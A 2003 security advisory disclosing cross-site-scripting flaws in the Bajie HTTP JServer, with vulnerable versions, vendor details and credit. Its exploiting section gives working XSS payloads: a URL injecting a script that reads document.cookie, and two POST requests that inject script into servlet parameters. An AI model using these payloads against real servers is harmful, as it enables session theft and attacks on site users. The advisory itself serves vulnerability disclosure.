CSS Vulnerability in Bajie HTTP JServer
=======================================

Even though the cross-site-scripting vulnerability published under BID 7344 was fixed with 
Built 0.95zxe1, the current version of Bajie HTTP Jserver is still vulnerable to 
cross-site-scripting attacks. 

Vulnerable versions:
====================

The latest version BajieJSrv/0.95zxv4 and probably older ones.

Exploiting:
===========

The cross side scripting vulnerability can easily be demonstrated with a web browser:
 
   http://localhost/cgi/bin/test.txt?<script>alert(document.cookie)</script>

The following css’s can be demonstrated either by inserting code into the html-forms 
with a browser,or sending via netcat a string like:

  POST /servlet/custMsg?guestName=<script>alert("bang")</script> HTTP/1.0

  POST /servlet/CookieExample?cookiename=<script>alert("bang")</script>&cookievalue=&cookiepath=   
  HTTP/1.0

Vendor:
=======

Name: Gang Zhang (gzhangx@hotmail.com)
Homepage: http://go.to/bajie

Discovered by/Credit:
=====================

16.10.2003 Oliver Karow (oliver.karow[at]gmx.de)